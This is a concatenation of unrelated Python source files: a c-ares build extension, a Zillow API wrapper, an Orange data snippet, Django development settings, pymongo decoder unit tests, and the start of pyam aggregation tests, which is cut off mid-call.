| StarcoderdataPython |
37396 |
import errno
import os
import subprocess
import sys
from distutils import log
from distutils.command.build_ext import build_ext
from distutils.errors import DistutilsError
def exec_process(cmdline, silent=True, catch_enoent=True, input=None, **kwargs):
    """Execute a subprocess and return its decoded stdout.

    Args:
        cmdline (list): command and its arguments.
        silent (bool): when False, echo the child's stdout/stderr.
        catch_enoent (bool): translate a missing executable (ENOENT) into a
            DistutilsError instead of letting OSError propagate.
        input: optional bytes to feed to the child's stdin.
        **kwargs: forwarded to subprocess.Popen (cwd, env, shell, ...).
    Returns:
        str: the child's stdout.
    Raises:
        DistutilsError: missing executable (with catch_enoent) or a non-zero
            exit status.
    """
    try:
        sub = subprocess.Popen(args=cmdline, stdin=subprocess.PIPE,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                               **kwargs)
        stdout, stderr = sub.communicate(input=input)
        if isinstance(stdout, bytes):
            # Popen pipes yield bytes unless text mode was requested; decode
            # with replacement so undecodable build output cannot crash us.
            stdout = stdout.decode(sys.getdefaultencoding(), "replace")
            stderr = stderr.decode(sys.getdefaultencoding(), "replace")
        returncode = sub.returncode
        if not silent:
            sys.stdout.write(stdout)
            sys.stderr.write(stderr)
    except OSError as e:
        if e.errno == errno.ENOENT and catch_enoent:
            raise DistutilsError('"%s" is not present on this system' % cmdline[0])
        else:
            raise
    if returncode != 0:
        raise DistutilsError('Got return value %d while executing "%s", stderr output was:\n%s' % (returncode, " ".join(cmdline), stderr.rstrip("\n")))
    return stdout
def exec_make(cmdline, *args, **kwargs):
    """Run make with the given arguments, preferring ``gmake`` on BSD systems.

    Raises DistutilsError when no usable make binary is found.
    """
    assert isinstance(cmdline, list)
    on_bsd = "bsd" in sys.platform
    candidates = ["gmake", "make"] if on_bsd else ["make"]
    for candidate in candidates:
        if on_bsd and candidate == "make":
            log.warn("Running plain make on BSD-derived system. It will likely fail. Consider installing GNU make from the ports collection.")
        try:
            return exec_process([candidate] + cmdline, *args, catch_enoent=False, **kwargs)
        except OSError as e:
            # binary missing: try the next candidate; anything else is fatal
            if e.errno != errno.ENOENT:
                raise
    raise DistutilsError('"make" is not present on this system')
class cares_build_ext(build_ext):
    """build_ext subclass that compiles the bundled c-ares library before
    building the extension, and wires the resulting static library in.
    """

    # location of the bundled c-ares source tree
    cares_dir = os.path.join('deps', 'c-ares')
    user_options = build_ext.user_options
    user_options.extend([
        ("cares-clean-compile", None, "Clean c-ares tree before compilation"),
    ])
    boolean_options = build_ext.boolean_options
    boolean_options.extend(["cares-clean-compile"])

    def initialize_options(self):
        build_ext.initialize_options(self)
        self.cares_clean_compile = 0

    def build_extensions(self):
        if self.compiler.compiler_type == 'mingw32':
            # Dirty hack to avoid linking with more than one C runtime when using MinGW
            self.compiler.dll_libraries = [lib for lib in self.compiler.dll_libraries if not lib.startswith('msvcr')]
        # a requested clean also forces the extension rebuild
        self.force = self.cares_clean_compile
        if self.compiler.compiler_type == 'msvc':
            self.cares_lib = os.path.join(self.cares_dir, 'cares.lib')
        else:
            self.cares_lib = os.path.join(self.cares_dir, 'libcares.a')
        self.build_cares()
        # Set compiler options
        if self.compiler.compiler_type == 'mingw32':
            self.compiler.add_library_dir(self.cares_dir)
            self.compiler.add_library('cares')
        # link the freshly built static library into the extension
        self.extensions[0].extra_objects = [self.cares_lib]
        self.compiler.add_include_dir(os.path.join(self.cares_dir, 'src'))
        if sys.platform.startswith('linux'):
            self.compiler.add_library('rt')
        elif sys.platform == 'win32':
            if self.compiler.compiler_type == 'msvc':
                self.extensions[0].extra_link_args = ['/NODEFAULTLIB:libcmt']
            self.compiler.add_library('advapi32')
            self.compiler.add_library('iphlpapi')
            self.compiler.add_library('psapi')
            self.compiler.add_library('ws2_32')
        build_ext.build_extensions(self)

    def build_cares(self):
        """Build (or clean+build) the bundled c-ares tree if needed."""
        #self.debug_mode = bool(self.debug) or hasattr(sys, 'gettotalrefcount')
        win32_msvc = self.compiler.compiler_type == 'msvc'

        def build():
            # position-independent code is required to link into a shared object
            cflags = '-fPIC'
            env = os.environ.copy()
            env['CFLAGS'] = ' '.join(x for x in (cflags, env.get('CFLAGS', None)) if x)
            log.info('Building c-ares...')
            if win32_msvc:
                exec_process('cmd.exe /C vcbuild.bat', cwd=self.cares_dir, env=env, shell=True)
            else:
                exec_make(['libcares.a'], cwd=self.cares_dir, env=env)

        def clean():
            if win32_msvc:
                exec_process('cmd.exe /C vcbuild.bat clean', cwd=self.cares_dir, shell=True)
            else:
                exec_make(['clean'], cwd=self.cares_dir)

        if self.cares_clean_compile:
            clean()
        if not os.path.exists(self.cares_lib):
            log.info('c-ares needs to be compiled.')
            build()
        else:
            log.info('No need to build c-ares.')
| StarcoderdataPython |
3362407 | <reponame>hanneshapke/pyzillow
import requests
from xml.etree import cElementTree as ElementTree # for zillow API
from .pyzillowerrors import ZillowError, ZillowFail, ZillowNoResults
from . import __version__
class ZillowWrapper(object):
    """This class provides an interface into the Zillow API.

    An API key is required to create an instance of this class:

    >>> from pyzillow.pyzillow import ZillowWrapper
    >>> zillow_data = ZillowWrapper(YOUR_ZILLOW_API_KEY)

    To request data from Zillow, you can choose between:

    1. The GetDeepSearchResults API endpoint (:class:`pyzillow.pyzillow.GetDeepSearchResults`)
    which requires the following arguments:

    * A street address (e.g. ``'2114 Bigelow Ave'``)
    * A ZIP code or city and state combination (e.g. ``'98109'`` or ``'Seattle, WA'``)
    * Optional: Enabling or disabling Zillow Rentzestimate information in
      API results (``True``/``False``)

    Example:

    >>> from pyzillow.pyzillow import ZillowWrapper, GetDeepSearchResults
    >>> zillow_data = ZillowWrapper(YOUR_ZILLOW_API_KEY)
    >>> deep_search_response = zillow_data.get_deep_search_results(address,
                                                                   zipcode,
                                                                   rentzestimate)
    >>> result = GetDeepSearchResults(deep_search_response)

    2. The GetUpdatedPropertyDetails API endpoint
    (:class:`pyzillow.pyzillow.GetUpdatedPropertyDetails`) which requires a
    Zillow Property ID (ZPID) as an argument. You can acquire this identifier by
    accessing ``.zillow_id`` from a :class:`pyzillow.pyzillow.GetDeepSearchResults`
    object. GetUpdatedPropertyDetails data is not available for all valid Zillow IDs.

    Example:

    >>> from pyzillow.pyzillow import ZillowWrapper, GetUpdatedPropertyDetails
    >>> zillow_data = ZillowWrapper(YOUR_ZILLOW_API_KEY)
    >>> updated_property_details_response = \
        zillow_data.get_updated_property_details(zillow_id)
    >>> result = GetUpdatedPropertyDetails(updated_property_details_response)
    """

    def __init__(self, api_key: str = None):
        """Store the Zillow API key; it is sent with every request as the
        ``zws-id`` parameter.
        """
        self.api_key = api_key

    def get_deep_search_results(
        self, address: str, zipcode: str, rentzestimate: bool = False
    ):
        """This method provides results from the GetDeepSearchResults API endpoint as an XML object.

        :param address: Street address to look up
        :type address: str
        :param zipcode: ZIP code to look up
        :type zipcode: str
        :param rentzestimate: Add Rent Zestimate information to result (True/False),
            defaults to False
        :type rentzestimate: bool, optional
        :return: Result from API query
        :rtype: xml.etree.ElementTree.Element
        """
        url = "http://www.zillow.com/webservice/GetDeepSearchResults.htm"
        params = {
            "address": address,
            "citystatezip": zipcode,
            # Zillow expects a lowercase string literal ("true"/"false")
            "rentzestimate": str(rentzestimate).lower(),
            "zws-id": self.api_key,
        }
        return self.get_data(url, params)

    def get_updated_property_details(self, zpid: str):
        """This method provides results from the GetUpdatedPropertyDetails API endpoint as an XML object.

        :param zpid: Zillow Web Service Identifier
        :type zpid: str
        :return: Result from API query
        :rtype: xml.etree.ElementTree.Element
        """
        url = "http://www.zillow.com/webservice/GetUpdatedPropertyDetails.htm"
        params = {"zpid": zpid, "zws-id": self.api_key}
        return self.get_data(url, params)

    def get_data(self, url: str, params: dict):
        """This method requests data from the API endpoint specified in the url argument.
        It uses parameters from the params argument.

        :param url: URL of API endpoint
        :type url: str
        :param params: Parameters for API query
        :type params: dict
        :raises ZillowFail: The API endpoint could not be reached or the request
            did not return valid XML
        :raises ZillowError: The API endpoint responded with an error code
        :raises ZillowNoResults: The request did not return any results
        :return: Result from API query
        :rtype: xml.etree.ElementTree.Element
        """
        try:
            request = requests.get(
                url=url,
                params=params,
                headers={
                    "User-Agent": "".join(["pyzillow/", __version__, " (Python)"])
                },
            )
        except (
            requests.exceptions.ConnectionError,
            requests.exceptions.TooManyRedirects,
            requests.exceptions.Timeout,
        ):
            raise ZillowFail
        try:
            request.raise_for_status()
        except requests.exceptions.HTTPError:
            raise ZillowFail
        try:
            response = ElementTree.fromstring(request.text)
        except ElementTree.ParseError:
            print("Zillow response is not a valid XML ({})".format(params["address"]))
            raise ZillowFail
        # Zillow reports success with message code "0"; any other code is an
        # API-level error even though the HTTP status was 200.
        if response.findall("message/code")[0].text != "0":
            raise ZillowError(int(str(response.findall("message/code")[0].text)))
        else:
            if not response.findall("response"):
                print("Zillow returned no results for ({})".format(params["address"]))
                raise ZillowNoResults
            return response
class ZillowResults(object):
    """Base class for :class:`pyzillow.pyzillow.GetDeepSearchResults`
    and :class:`pyzillow.pyzillow.GetUpdatedPropertyDetails`.

    Subclasses override ``attribute_mapping`` with a dict mapping attribute
    names to element paths inside the XML stored on ``self.data``.
    """

    def __init__(self):
        self.attribute_mapping = {}

    def get_attr(self, attr):
        """Return the text of the XML element mapped to *attr*.

        :param attr: Key into ``attribute_mapping``
        :return: Element text, or None if the element is absent
        """
        try:
            return self.data.find(self.attribute_mapping[attr]).text
        except AttributeError:
            # find() returned None: the element is missing from the response.
            return None

    def __str__(self):
        return self.zillow_id

    @property
    def area_unit(self):
        """Unit of measurement for ``lotSizeSqFt``."""
        return u"SqFt"

    @property
    def last_sold_price_currency(self):
        """Currency attribute of the ``lastSoldPrice`` element.

        Returns None when the element is absent, consistent with
        :meth:`get_attr` (previously this raised AttributeError).
        """
        try:
            return self.data.find(self.attribute_mapping["last_sold_price"]).attrib[
                "currency"
            ]
        except AttributeError:
            return None
class GetDeepSearchResults(ZillowResults):
    """Maps results from the XML data array into attributes of an instance
    of GetDeepSearchResults.

    An instance of ``GetDeepSearchResults`` has the following attributes:
    ``.bathrooms``
    ``.bedrooms``
    ``.city``
    ``.fips_county``
    ``.graph_data_link``
    ``.home_detail_link``
    ``.home_size``
    ``.home_type``
    ``.last_sold_date``
    ``.last_sold_price``
    ``.latitude``
    ``.longitude``
    ``.map_this_home_link``
    ``.property_size``
    ``.rentzestimate_amount``
    ``.rentzestimate_last_updated``
    ``.rentzestimate_valuation_range_high``
    ``.rentzestimate_valuation_range_low``
    ``.rentzestimate_value_change``
    ``.state``
    ``.street``
    ``.tax_value``
    ``.tax_year``
    ``.total_rooms``
    ``.use_code``
    ``.year_built``
    ``.zestimate_amount``
    ``.zestimate_last_updated``
    ``.zestimate_percentile``
    ``.zestimate_valuation_range_high``
    ``.zestimate_valuation_range_low``
    ``.zestimate_value_change``
    ``.zillow_id``
    ``.zipcode``
    """

    attribute_mapping = {
        "bathrooms": "result/bathrooms",
        "bedrooms": "result/bedrooms",
        "city": "result/address/city",
        "fips_county": "result/FIPScounty",
        "graph_data_link": "result/links/graphsanddata",
        "home_detail_link": "result/links/homedetails",
        "home_size": "result/finishedSqFt",
        "home_type": "result/useCode",
        "last_sold_date": "result/lastSoldDate",
        "last_sold_price": "result/lastSoldPrice",
        "latitude": "result/address/latitude",
        "longitude": "result/address/longitude",
        "map_this_home_link": "result/links/mapthishome",
        "property_size": "result/lotSizeSqFt",
        "rentzestimate_amount": "result/rentzestimate/amount",
        "rentzestimate_last_updated": "result/rentzestimate/last-updated",
        "rentzestimate_valuation_range_high": "result/rentzestimate/valuationRange/high",
        "rentzestimate_valuation_range_low": "result/rentzestimate/valuationRange/low",
        "rentzestimate_value_change": "result/rentzestimate/valueChange",
        "state": "result/address/state",
        "street": "result/address/street",
        "tax_value": "result/taxAssessment",
        "tax_year": "result/taxAssessmentYear",
        "total_rooms": "result/totalRooms",
        "use_code": "result/useCode",
        "year_built": "result/yearBuilt",
        "zestimate_amount": "result/zestimate/amount",
        "zestimate_last_updated": "result/zestimate/last-updated",
        "zestimate_percentile": "result/zestimate/percentile",
        "zestimate_valuation_range_high": "result/zestimate/valuationRange/high",
        "zestimate_valuation_range_low": "result/zestimate/valuationRange/low",
        "zestimate_value_change": "result/zestimate/valueChange",
        "zillow_id": "result/zpid",
        "zipcode": "result/address/zipcode",
    }

    def __init__(self, data, *args, **kwargs):
        """Constructor method

        :param data: Parsed XML response from the GetDeepSearchResults
            endpoint (``xml.etree.ElementTree.Element``)
        """
        self.data = data.findall("response/results")[0]
        # Dicts are directly iterable; calling __iter__() explicitly was
        # redundant.
        for attr in self.attribute_mapping:
            try:
                self.__setattr__(attr, self.get_attr(attr))
            except AttributeError:
                print("AttributeError with {}".format(attr))

    def _region_attrib(self, key):
        """Return attribute *key* of the ``localRealEstate/region`` element,
        or None when the element is absent. Shared by the region properties
        below (previously three identical try/except blocks)."""
        try:
            return self.data.find("result/localRealEstate/region").attrib[key]
        except AttributeError:
            return None

    @property
    def region_name(self):
        """Name of the local real estate region, or None."""
        return self._region_attrib("name")

    @property
    def region_id(self):
        """Identifier of the local real estate region, or None."""
        return self._region_attrib("id")

    @property
    def region_type(self):
        """Type of the local real estate region, or None."""
        return self._region_attrib("type")
class GetUpdatedPropertyDetails(ZillowResults):
    """Maps results from the XML data array into attributes of an instance
    of GetUpdatedPropertyDetails.

    An instance of ``GetUpdatedPropertyDetails`` has the following attributes:
    ``.agent_name``
    ``.agent_profile_url``
    ``.appliances``
    ``.basement``
    ``.bathrooms``
    ``.bedrooms``
    ``.brokerage``
    ``.city``
    ``.cooling_system``
    ``.elementary_school``
    ``.exterior_material``
    ``.floor_material``
    ``.heating_sources``
    ``.heating_system``
    ``.high_school``
    ``.home_description``
    ``.home_detail_link``
    ``.home_info``
    ``.home_size``
    ``.home_type``
    ``.latitude``
    ``.longitude``
    ``.middle_school``
    ``.neighborhood``
    ``.num_floors``
    ``.num_rooms``
    ``.page_view_count_this_month``
    ``.page_view_count_total``
    ``.parking_type``
    ``.photo_gallery``
    ``.posting_agent``
    ``.posting_last_update``
    ``.posting_mls``
    ``.posting_status``
    ``.posting_type``
    ``.price``
    ``.property_size``
    ``.roof``
    ``.rooms``
    ``.school_district``
    ``.state``
    ``.street``
    ``.view``
    ``.year_built``
    ``.year_updated``
    ``.zillow_id``
    ``.zipcode``
    """

    # NOTE(review): the "result/address/*" paths below look copied from
    # GetDeepSearchResults; this endpoint's response nests <address> directly
    # under <response> (cf. latitude/longitude using "address/..."). Verify
    # against the API before relying on city/state/street/zipcode here.
    attribute_mapping = {
        # attributes in common with GetDeepSearchResults
        "bathrooms": "editedFacts/bathrooms",
        "bedrooms": "editedFacts/bedrooms",
        "city": "result/address/city",
        "home_detail_link": "links/homeDetails",
        "home_size": "editedFacts/finishedSqFt",
        "home_type": "editedFacts/useCode",
        "latitude": "address/latitude",
        "longitude": "address/longitude",
        "property_size": "editedFacts/lotSizeSqFt",
        "state": "result/address/state",
        "street": "result/address/street",
        "year_built": "editedFacts/yearBuilt",
        "zillow_id": "zpid",
        "zipcode": "result/address/zipcode",
        # new attributes in GetUpdatedPropertyDetails
        "agent_name": "posting/agentName",
        "agent_profile_url": "posting/agentProfileUrl",
        "appliances": "editedFacts/appliances",
        "basement": "editedFacts/basement",
        "brokerage": "posting/brokerage",
        "cooling_system": "editedFacts/coolingSystem",
        "elementary_school": "elementarySchool",
        "exterior_material": "editedFacts/exteriorMaterial",
        "floor_material": "editedFacts/floorCovering",
        "heating_sources": "editedFacts/heatingSources",
        "heating_system": "editedFacts/heatingSystem",
        "high_school": "highSchool",
        "home_description": "homeDescription",
        "home_info": "links/homeInfo",
        "middle_school": "middleSchool",
        "neighborhood": "neighborhood",
        "num_floors": "editedFacts/numFloors",
        "num_rooms": "editedFacts/numRooms",
        "page_view_count_this_month": "pageViewCount/currentMonth",
        "page_view_count_total": "pageViewCount/total",
        "parking_type": "editedFacts/parkingType",
        # Bug fix: "photo_gallery" was listed twice; dict literals silently
        # keep only the last duplicate, so one entry is removed.
        "photo_gallery": "links/photoGallery",
        "posting_agent": "posting/agentName",
        "posting_last_update": "posting/lastUpdatedDate",
        "posting_mls": "posting/mls",
        "posting_status": "posting/status",
        "posting_type": "posting/type",
        "price": "price",
        "roof": "editedFacts/roof",
        "rooms": "editedFacts/rooms",
        "school_district": "schoolDistrict",
        "view": "editedFacts/view",
        "year_updated": "editedFacts/yearUpdated",
    }

    def __init__(self, data, *args, **kwargs):
        """Constructor method

        :param data: Parsed XML response from the GetUpdatedPropertyDetails
            endpoint (``xml.etree.ElementTree.Element``)
        """
        self.data = data.findall("response")[0]
        # Dicts are directly iterable; __iter__() was redundant.
        for attr in self.attribute_mapping:
            try:
                self.__setattr__(attr, self.get_attr(attr))
            except AttributeError:
                print("AttributeError with {}".format(attr))
| StarcoderdataPython |
1681748 | import Orange
# Load the classic iris dataset that ships with Orange.
data = Orange.data.Table("iris.tab")
print("Dataset instances:", len(data))
# Build a new table (same domain) containing only the instances whose
# petal length exceeds 3.0.
subset = Orange.data.Table(data.domain, [d for d in data if d["petal length"] > 3.0])
print("Subset size:", len(subset))
| StarcoderdataPython |
4816794 | <filename>ozz/settings.py
"""
Django settings for ozz project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os

# BASE_DIR is the repository root (two levels above this settings module).
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATES_DIR = os.path.join(BASE_DIR, 'templates')
STATIC_DIR = os.path.join(BASE_DIR, 'static')

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '<KEY>'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

#LOGIN_URL='/accounts/login/'
#LOGIN_REDIRECT_URL='/'

# Application definition
#
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Project apps
    'accounts',
    'sms',
    'airtime',
    'dashboard',
    'payments',
    'voice',
)

MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'django.middleware.security.SecurityMiddleware',
)

ROOT_URLCONF = 'ozz.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [TEMPLATES_DIR],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'ozz.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# Local development uses SQLite; django_heroku.settings() below overrides
# this with DATABASE_URL when deployed.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
    #DATABASE_ENGINE = ''
    #DATABASE_NAME = ''
    #DATABASE_USER = ''
    #DATABASE_PASSWORD = ''
    #DATABASE_HOST = ''
    #DATABASE_PORT = ''
}

# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'

STATICFILES_DIRS = [
    STATIC_DIR,
]

#activate django_heroku
import django_heroku
django_heroku.settings(locals())
| StarcoderdataPython |
1724016 | from __future__ import annotations
from unittest import TestCase
from typing import List, Dict
from datetime import date, datetime, timezone
from bson import ObjectId
from jsonclasses import jsonclass, types
from jsonclasses_pymongo import pymongo
from jsonclasses_pymongo.decoder import Decoder
class TestDecoder(TestCase):
    """Unit tests for jsonclasses_pymongo's Decoder.decode_root.

    Each test declares a throwaway @pymongo/@jsonclass model, feeds a raw
    MongoDB-style document into ``Decoder().decode_root`` and asserts that
    the resulting instance carries the expected Python values.
    """

    def test_decode_str_into_str(self):
        # BSON string fields map straight to Python str attributes.
        @pymongo
        @jsonclass
        class SimpleDecodeStr:
            id: str = types.readonly.str.primary.mongoid.required
            val1: str
            val2: str
        data = {
            '_id': ObjectId(),
            'createdAt': datetime.now(),
            'updatedAt': datetime.now(),
            'val1': '12345',
            'val2': '67890'
        }
        instance = Decoder().decode_root(data, SimpleDecodeStr)
        self.assertEqual(instance.id, str(data['_id']))
        self.assertEqual(instance.val1, '12345')
        self.assertEqual(instance.val2, '67890')
        self.assertIsInstance(instance.val1, str)
        self.assertIsInstance(instance.val2, str)

    def test_decode_int_into_int(self):
        # BSON ints are decoded as Python ints.
        @pymongo
        @jsonclass
        class SimpleDecodeInt:
            id: str = types.readonly.str.primary.mongoid.required
            val1: int
            val2: int
        data = {
            '_id': ObjectId(),
            'createdAt': datetime.now(),
            'updatedAt': datetime.now(),
            'val1': 12345,
            'val2': 67890
        }
        instance = Decoder().decode_root(data, SimpleDecodeInt)
        self.assertEqual(instance.id, str(data['_id']))
        self.assertEqual(instance.val1, 12345)
        self.assertEqual(instance.val2, 67890)

    def test_decode_float_into_float(self):
        # BSON doubles are decoded as Python floats.
        @pymongo
        @jsonclass
        class SimpleDecodeFloat:
            id: str = types.readonly.str.primary.mongoid.required
            val1: float
            val2: float
        data = {
            '_id': ObjectId(),
            'createdAt': datetime.now(),
            'updatedAt': datetime.now(),
            'val1': 12345.6,
            'val2': 67890.1
        }
        instance = Decoder().decode_root(data, SimpleDecodeFloat)
        self.assertEqual(instance.id, str(data['_id']))
        self.assertEqual(instance.val1, 12345.6)
        self.assertEqual(instance.val2, 67890.1)

    def test_decode_bool_into_bool(self):
        # BSON booleans are decoded as Python bools.
        @pymongo
        @jsonclass
        class SimpleDecodeBool:
            id: str = types.readonly.str.primary.mongoid.required
            val1: bool
            val2: bool
        data = {
            '_id': ObjectId(),
            'createdAt': datetime.now(),
            'updatedAt': datetime.now(),
            'val1': True,
            'val2': False
        }
        instance = Decoder().decode_root(data, SimpleDecodeBool)
        self.assertEqual(instance.id, str(data['_id']))
        self.assertEqual(instance.val1, True)
        self.assertEqual(instance.val2, False)

    def test_decode_datetime_into_date(self):
        # Mongo stores dates as datetimes; fields annotated `date` are
        # truncated back to date objects.
        @pymongo
        @jsonclass
        class SimpleDecodeDate:
            id: str = types.readonly.str.primary.mongoid.required
            val1: date
            val2: date
        data = {
            '_id': ObjectId(),
            'createdAt': datetime.now(),
            'updatedAt': datetime.now(),
            'val1': datetime(2012, 9, 5, 0, 0, 0),
            'val2': datetime(2020, 9, 5, 0, 0, 0),
        }
        instance = Decoder().decode_root(data, SimpleDecodeDate)
        self.assertEqual(instance.id, str(data['_id']))
        self.assertEqual(instance.val1, date(2012, 9, 5))
        self.assertEqual(instance.val2, date(2020, 9, 5))

    def test_decode_datetime_into_datetime(self):
        # Naive stored datetimes come back UTC-aware.
        @pymongo
        @jsonclass
        class SimpleDecodeDatetime:
            id: str = types.readonly.str.primary.mongoid.required
            val1: datetime
            val2: datetime
        data = {
            '_id': ObjectId(),
            'createdAt': datetime.now(),
            'updatedAt': datetime.now(),
            'val1': datetime(2012, 9, 5, 6, 25, 0),
            'val2': datetime(2020, 9, 5, 8, 25, 0),
        }
        instance = Decoder().decode_root(data, SimpleDecodeDatetime)
        self.assertEqual(instance.id, str(data['_id']))
        self.assertEqual(instance.val1, datetime(2012, 9, 5, 6, 25, 0, tzinfo=timezone.utc))
        self.assertEqual(instance.val2, datetime(2020, 9, 5, 8, 25, 0, tzinfo=timezone.utc))

    def test_decode_embedded_list(self):
        # A plain BSON array decodes into a Python list.
        @pymongo
        @jsonclass
        class SimpleDecodeList:
            id: str = types.readonly.str.primary.mongoid.required
            vals: List[int]
        data = {
            '_id': ObjectId(),
            'createdAt': datetime.now(),
            'updatedAt': datetime.now(),
            'vals': [1, 2, 3, 4, 5]
        }
        instance = Decoder().decode_root(data, SimpleDecodeList)
        self.assertEqual(instance.id, str(data['_id']))
        self.assertEqual(instance.vals, [1, 2, 3, 4, 5])

    def test_decode_local_keys_list(self):
        # A linked list field stores foreign ObjectIds under the camelized
        # "<name>Ids" key; the decoder exposes them as "<name>_ids" strings.
        @pymongo
        @jsonclass
        class SimpleDecodeLocalKeyListAddress:
            id: str = types.readonly.str.primary.mongoid.required
            city: str
            owner: SimpleDecodeLocalKeyList = types.objof(
                'SimpleDecodeLocalKeyList').linkedby('address')

        @pymongo
        @jsonclass
        class SimpleDecodeLocalKeyList:
            id: str = types.readonly.str.primary.mongoid.required
            addresses: List[SimpleDecodeLocalKeyListAddress] = (types.linkto
                .listof(SimpleDecodeLocalKeyListAddress))
        data = {
            '_id': ObjectId(),
            'createdAt': datetime.now(),
            'updatedAt': datetime.now(),
            'addressIds': [ObjectId(), ObjectId()]
        }
        instance = Decoder().decode_root(data, SimpleDecodeLocalKeyList)
        self.assertEqual(instance.id, str(data['_id']))
        self.assertEqual(getattr(instance, 'address_ids')
                         [0], str(data['addressIds'][0]))
        self.assertEqual(getattr(instance, 'address_ids')
                         [1], str(data['addressIds'][1]))

    def test_decode_embedded_dict(self):
        # A BSON subdocument annotated Dict decodes into a Python dict.
        @pymongo
        @jsonclass
        class SimpleDecodeDict:
            id: str = types.readonly.str.primary.mongoid.required
            vals: Dict[str, int]
        data = {
            '_id': ObjectId(),
            'createdAt': datetime.now(),
            'updatedAt': datetime.now(),
            'vals': {'one': 1, 'two': 2}
        }
        instance = Decoder().decode_root(data, SimpleDecodeDict)
        self.assertEqual(instance.id, str(data['_id']))
        self.assertEqual(instance.vals, {'one': 1, 'two': 2})

    def test_decode_embedded_instance(self):
        # A nested document decodes into a nested jsonclass instance.
        @pymongo
        @jsonclass
        class SimpleDecodeInstanceAddress:
            id: str = types.readonly.str.primary.mongoid.required
            city: str

        @pymongo
        @jsonclass
        class SimpleDecodeInstance:
            id: str = types.readonly.str.primary.mongoid.required
            address: SimpleDecodeInstanceAddress
        data = {
            '_id': ObjectId(),
            'createdAt': datetime.now(),
            'updatedAt': datetime.now(),
            'address': {
                '_id': ObjectId(),
                'createdAt': datetime.now(),
                'updatedAt': datetime.now(),
                'city': 'Shanghai'
            }
        }
        instance = Decoder().decode_root(data, SimpleDecodeInstance)
        self.assertEqual(instance.id, str(data['_id']))
        self.assertEqual(instance.address.id, str(data['address']['_id']))
        self.assertEqual(instance.address.city, "Shanghai")

    def test_decode_local_key_instance(self):
        # A single linked reference stored as "<name>Id" becomes "<name>_id".
        @pymongo
        @jsonclass
        class SimpleDecodeLocalKeyInstanceAddress:
            id: str = types.readonly.str.primary.mongoid.required
            city: str
            owner: SimpleDecodeLocalKeyInstance = types.objof(
                'SimpleDecodeLocalKeyInstance').linkedby('address')

        @pymongo
        @jsonclass
        class SimpleDecodeLocalKeyInstance:
            id: str = types.readonly.str.primary.mongoid.required
            address: SimpleDecodeLocalKeyInstanceAddress = (types
                .linkto.objof(
                    SimpleDecodeLocalKeyInstanceAddress))
        data = {
            '_id': ObjectId(),
            'createdAt': datetime.now(),
            'updatedAt': datetime.now(),
            'addressId': ObjectId()
        }
        instance = Decoder().decode_root(data, SimpleDecodeLocalKeyInstance)
        self.assertEqual(instance.id, str(data['_id']))
        self.assertEqual(getattr(instance, 'address_id'),
                         str(data['addressId']))

    def test_decode_keep_dict_keys(self):
        # Keys inside a user Dict value must NOT be de-camelized on decode.
        @pymongo
        @jsonclass
        class MediumDecodeCamelizeDictKeys:
            id: str = types.readonly.str.primary.mongoid.required
            val: Dict[str, str] = types.dictof(types.str)
        data = {
            'val': {
                'keyOne': 'val_one',
                'keyTwo': 'val_two'
            }
        }
        instance = Decoder().decode_root(data, MediumDecodeCamelizeDictKeys)
        self.assertEqual(
            instance.val, {'keyOne': 'val_one', 'keyTwo': 'val_two'})
| StarcoderdataPython |
1786964 | <reponame>francescolovat/pyam
import pytest
import logging
import numpy as np
import pandas as pd
from pyam import check_aggregate, IamDataFrame, IAMC_IDX
from conftest import TEST_DTS
def test_missing_region(check_aggregate_df):
    """Aggregating into a region absent from the data still returns rows."""
    # for now, this test makes sure that this operation works as expected
    exp = check_aggregate_df.aggregate_region('Primary Energy', region='foo')
    assert len(exp) == 8
    # # this test should be updated to the below after the return type of
    # # aggregate_region() is updated
    # exp = check_aggregate_df.aggregate_region(
    #     'Primary Energy', region='foo', append=False
    # ).data
    # check_aggregate_df.aggregate_region(
    #     'Primary Energy', region='foo', append=True
    # )
    # obs = check_aggregate_df.filter(region='foo').data
    # assert len(exp) > 0
    # pd.testing.assert_frame_equal(obs.reset_index(drop=True),
    #                               exp.reset_index(drop=True))


def test_aggregate_region_extra_subregion():
    """Subregions not present in the data ('baz') are silently ignored."""
    cols = ['model', 'scenario', 'region', 'variable', 'unit', 2005, 2010]
    data = pd.DataFrame([
        ['model_a', 'scen_a', 'foo', 'Primary Energy', 'EJ/y', 1, 6],
        ['model_a', 'scen_a', 'bar', 'Primary Energy', 'EJ/y', 0.75, 5]],
        columns=cols)
    df = IamDataFrame(data=data)
    obs = df.aggregate_region(variable='Primary Energy',
